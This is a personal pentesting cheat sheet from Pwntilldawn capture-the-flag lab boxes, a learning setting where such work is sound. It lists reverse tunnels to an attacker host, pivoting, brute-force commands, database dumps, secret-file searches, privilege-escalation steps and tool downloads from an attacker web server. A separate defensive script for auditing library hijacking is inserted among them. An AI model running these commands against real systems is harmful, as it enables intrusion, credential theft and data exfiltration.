by Anthony Guilbert 2 days ago

Pwntilldawn Mindmap FULL

The document delves into various hacking tools and techniques used in cybersecurity, particularly focusing on the Pwntilldawn platform. It highlights the use of feroxbuster for enumerating directories and mentions the challenges faced, such as SSL errors when connecting to certain URLs.

Pwntilldawn FULL

Mindmap I did while doing some Pwntilldawn boxes

Pivoting / Tunneling

Tunneling & Port Forwarding
If we have SSH access

sshuttle -r user@ip -N

Web service listening on localhost

On the victim

./chisel client ip_host:7777 R:8080:127.0.0.1:8080

Don't forget to adapt port 8080 to the situation

On the host

chisel server -port 7777 --reverse

Check what is listening on localhost

NMAP

nmap -sV -sC -T5 -p- ip
Nmap Automator
nmap -sV -Pn -p- -T5 ip
sudo nmap -sF -p1-100 -T4

Miscellaneous protocols

DNS
! AXFR !

dig @mortysserver.com mortysserver.com axfr

Add to /etc/hosts if needed

Example: 10.150.150.57 rickscontrolpanel.mortysserver.com

SSH
Try connecting to grab the banner
Connect if we have the private key

ssh -i id_rsa user@ip

POP3
hydra -l operator -P wordlist.txt ip pop3
Mysql
mysql -h localhost -u sql_user -p
mysqldump -u root -p --all-databases > alldb.sql
FTP
Check anonymous login
NFS
showmount -e IP
rpcinfo IP
sudo mount -t nfs ip:/remote /local
sudo umount 10.150.150.59:/nfsroot
SMTP
hydra -l operator -P wordlist.txt ip smtp
smtp-user-enum -U /usr/share/wordlists/metasploit/unix_users.txt 10.150.150.17 25

Misc

netstat -antup
Dumb shell upgrade
python -c 'import pty; pty.spawn("/bin/bash")'
python3 -c 'import pty; pty.spawn("/bin/bash")'

script /dev/null -qc /bin/bash
If you need error output that isn't displayed (e.g. PHP webshell)
Append "2>file" to the command

then cat the file

Feroxbuster against a self-signed certificate: the scan fails on TLS verification unless -k is passed.

anthony@NS5x-NS7xAU:~/Desktop/tools/UDF$ feroxbuster --url https://bricks.thm/ --wordlist /usr/share/wordlists/dirb/big.txt
Could not connect to https://bricks.thm/ due to SSL errors (run with -k to ignore), skipping...
=> error sending request for url (https://bricks.thm/): error trying to connect: error:0A000086:SSL routines:tls_post_process_server_certificate:certificate verify failed:ssl/statem/statem_clnt.c:2091: (self-signed certificate)
ERROR: Could not connect to any target provided

Find files

Windows
@for /r C:\ %i in (FLAG??.txt) do @echo %i && @type "%i"
Linux
find / -type f -name 'FLAG[0-9][0-9]' 2>/dev/null
find ./* | grep FLAG3
find / -type f -name 'FLAG[0-9].txt' 2>/dev/null
find / -name FLAG6.txt 2>/dev/null
find / -type f -name ".env" 2>/dev/null

Privesc

SUID
find / -perm -u=s -type f 2>/dev/null
searchsploit
searchsploit -m path
searchsploit xxxx
Python Library Hijacking
Script running as root that imports libraries
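Defensive check for the library-hijacking item above, added here and not part of the mindmap: it audits a module search path for directories that other users can write to and that are searched before the module actually resolves, which is the condition a root-run script must avoid. The dropzone/lib directories and the helper module are constructed for the demo.

```python
"""Audit the module search path of a script that runs as root (added example).

A directory searched before the one holding a legitimately imported module,
and writable by a lower-privileged user, lets that user shadow the module.
The 'dropzone', 'lib' and 'helper' names below are constructed for the demo."""
import os
import stat
import sys
import tempfile

def holds_module(directory, module):
    """True if `module` resolves from `directory` (module file or package)."""
    return (os.path.isfile(os.path.join(directory, module + ".py"))
            or os.path.isfile(os.path.join(directory, module, "__init__.py")))

def writable_by_others(directory):
    """Group- or world-writable; a sticky bit still allows dropping a new file."""
    try:
        mode = os.stat(directory).st_mode
    except OSError:
        return False
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))

def hijackable_entries(module, search_path):
    """Entries searched before `module` resolves ('' = cwd) that others can write
    to; if the module never resolves, every writable entry is reported."""
    risky = []
    for entry in search_path:
        directory = entry or os.getcwd()
        if holds_module(directory, module):
            break
        if writable_by_others(directory):
            risky.append(directory)
    return risky

def demo():
    """Constructed scenario: a /tmp-like dir precedes the real library dir."""
    base = tempfile.mkdtemp()
    dropzone, libdir = os.path.join(base, "dropzone"), os.path.join(base, "lib")
    os.mkdir(dropzone)
    os.chmod(dropzone, 0o1777)  # sticky and world-writable, like /tmp
    os.mkdir(libdir, 0o755)
    with open(os.path.join(libdir, "helper.py"), "w") as fh:
        fh.write("VALUE = 1\n")
    before = hijackable_entries("helper", [dropzone, libdir])
    os.chmod(dropzone, 0o755)  # remediation: drop group/world write
    after = hijackable_entries("helper", [dropzone, libdir])
    return {"before": before, "after": after, "dropzone": dropzone}

if __name__ == "__main__":
    print(demo(), hijackable_entries("json", sys.path))  # also audit live sys.path
```

Run it as root (or as the account that runs the script) with the script's real sys.path to see which entries need their permissions or position fixed.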
LXC/LXD
https://book.hacktricks.xyz/linux-hardening/privilege-escalation/interesting-groups-linux-pe/lxd-privilege-escalation
Metasploit
Upgrade session: sessions -u
Windows
Shell

Upgrade shell

sessions -u id

ps --> migrate pid

msfconsole

post/multi/recon/local_exploit_suggester

linpeas
sudo python3 -m http.server port (on the attacker) then wget
Symbolic link
ln -s /root /home/michael/importantfiles/rootbackup

WEB

Wordpress
Bruteforce

wpscan --url url_wordpress --passwords wordlist

User enumeration

wpscan --url url --enumerate u

wpscan --url https://www.hackinprovence.fr/ -e u
Check for vulnerable themes and plugins

wpscan --url url --enumerate vp,vt

PHP Filters
python3 script.py --chain ''

https://github.com/synacktiv/php_filter_chain_generator/blob/main/php_filter_chain_generator.py

Enumeration
Path

Dirsearch

FeroxBuster

feroxbuster -u url -w ~/Desktop/SecLists-master/Discovery/Web-Content/common.txt --filter-status 404

feroxbuster -u http://example.com -w wordlist -x php,html,txt -v -o output.txt --filter-status 404

-k for a self-signed certificate

Bruteforce Forms
Hydra

hydra -l admin -P SecLists-master/rockyou.txt 10.150.150.38 -s 30609 -t 20 http-post-form "/jacegisecurity_check:jusername=^USER^&jpassword=^PASS^&from=%2F&Submit=Sign+in:Invalid username or password"

hydra -l operator -P wordlist.txt 10.150.150.56

Stegano

searchsploit
Depixelise
Unredactor
Depix

python3 depix.py -p pixel_image -s images/searchimages/image.png

Stereogram
https://piellardj.github.io/stereogram-solver/
Aperisolve
Steghide
steghide extract -sf screen.jpeg